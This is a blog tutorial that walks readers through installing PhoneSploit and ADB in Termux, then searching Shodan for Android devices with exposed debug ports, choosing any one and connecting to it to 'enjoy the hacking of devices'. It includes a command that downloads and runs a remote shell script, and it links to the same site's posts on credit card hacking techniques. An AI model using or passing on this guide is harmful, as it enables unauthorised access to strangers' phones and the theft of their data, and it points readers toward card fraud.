How to access any android device by open port use PhoneSploit
OR
Port is a type of programmable communication end point by which information or data goes from one device to another device from the internet in a network.If port are open of a device/computer then, it going to be very dangerous and vulnerable to get exploited and accessed to that device.
NOTE: EVERY RED COLOR TEXT IS THE CODE WHICH YOU HAVE TO ENTER IN THE TERMUX TERMINALEACH AND EVERY CODE MUST BE ENTER AFTER THIS $ SIGN FOR EX .$ cd Output
STEPS
1. Open Termux App.2. Wait for it to install configuration of termux app on android.3. Run the following command to update all configuration files of termux in android –
apt update

4. After that, run the following command to upgrade all configuration files of termux on android –
apt upgrade
5. After that, install python package with its all configuration files by run the following command –
pkg install python
6. Wait for installing the python package and after that, run the following command to install python2 package with its all configuration files –
pkg install python2
7. Wait for it and after complete the installation of python2 package, give permission to the termux to access your storage of phone by run the following command –
termux-setup-storage
after hit the enter button, you get a pop-up message asking to give access to storage. Simply click on Allow and after that your termux again show $ sign which indicates that termux successfully access to your storage.
8. After that, install the git package to set the environment of git to run git tools by run the following command –
pkg install git
9. After this, install the tool named PhoneSploit whose link is in the description of the video by run the following command –
git clone link_of_the_tool
e.g. git clone https://github.com/Zucccs/PhoneSploit
10. After installing the PhoneSploit, run the following command to check the PhoneSploit directory –
ls
After entering this command, we get PhoneSploit directory in Purple color means that this file is not accessible.

11. Change the directory to PhoneSploit by enter the following command –
cd PhoneSploit
12. Now, we are in the directory of PhoneSploit. We see all files of PhoneSploit.13. Now, Open a new session by swipe the screen from left to right and click on New Session.14. Now run the following command to print the colour text in termux –
pip2 install colorama
15. Now, its time to install ADB (Android Debug Bridge) whose work is that to establish the communication between Android device (target) and termux (hacking machine) to gain access on target..Run the following command to install ADB –
apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh
16. After completing the installation of ADB on termux, simply run the PhoneSploit by run the following command –
python2 main_linux.py
/what-is-a-computer-virus-a82f9491ad3644b89446d45233b57761.jpg)
17. Wait for a while and that’s it! PhoneSploit is started!18. To get an open port android device which is vulnerable, visit https://www.shodan.io
19. Enter the website and in search bar, search “Android Debug” (Without Quotations).
20. Choose any of the device want to hack and copy the IP Address of that device.
21. Enter into termux app, and enter 3 to connect a new device.
22. Wait for a while and after that, paste the IP Address that we copied in it.
23. Wait for a second and that’s it! Target device is connected to termux and now use the following commands show by the PhoneSploit and enjoy the hacking of devices.
Happy Hacking😈
SPECIAL THANKS TO MR ABHISHEK KUMAR FOR CONTENT WRITING SUPPORTANDMR ANURAG SHRIVASTAVA FOR YOU TUBE VIDEO SUPPORT
THIS IS NOT OVER YET IF WANT TO KNOW MORE ABOUT CARD SCAMS
WATCH OUR NEXT BLOG ON TYPES OF CREDIT CARD SCAMS
TECHNIQUES OF HACKING
https://scriptkiddieshackers.blogspot.com/2020/06/basic-techniques-for-card-details.html
HOW TO AVOID THIS
https://scriptkiddieshackers.blogspot.com/2020/06/how-to-avoid-all-of-this-hacking-with.html
WHAT IS CARD BASED HACKING
https://scriptkiddieshackers.blogspot.com/2020/06/card-based-hacking-part-1-introduction.html
NOTE: OUR EACH AND EVERY PICTURE OF THIS BLOG IS DIRECTLY TAKEN BY GOOGLE.COM AND SOME CONTENT IS ALSO COPIED FROM GOOGLE FOR BETTER ANALYTICS AND PROPER REPORT.
/what-is-a-computer-virus-a82f9491ad3644b89446d45233b57761.jpg)
THIS IS NOT OVER YET IF WANT TO KNOW MORE ABOUT CARD SCAMS
WATCH OUR NEXT BLOG ON TYPES OF CREDIT CARD SCAMS
TECHNIQUES OF HACKING
https://scriptkiddieshackers.blogspot.com/2020/06/basic-techniques-for-card-details.html
HOW TO AVOID THIS
https://scriptkiddieshackers.blogspot.com/2020/06/how-to-avoid-all-of-this-hacking-with.html
WHAT IS CARD BASED HACKING
https://scriptkiddieshackers.blogspot.com/2020/06/card-based-hacking-part-1-introduction.html
THANK YOU VERY MUCH
PLEASE SHOW YOUR LOVE BY LIKE , COMMENTS AND SUBSCRIBE US FOR MORE TECH RELATED CONTENT
our telegram link
https://t.me/w36c0d3r
Our youtube teaser video
https://youtu.be/D5XwOuB4ZMg
http://www.scriptkiddies.cf/
our website link
https://www.scriptkiddieshackers.com/2020/06/hacking-hacking-refers-to.html
our blog link
https://instagram.com/script_kiddies_developers?igshid=17prws6olul0r
Our Instagram page link
https://instagram.com/team_script_kiddies?igshid=ei7vr4q1vpls
FOR MORE INFORMATION ABOUT THIS YOU CAN CONTACT ME AS MY DETAILS ARE GIVEN 
FOR MORE INFORMATION ABOUT THIS YOU CAN CONTACT ME AS MY DETAILS ARE GIVEN
0 Comments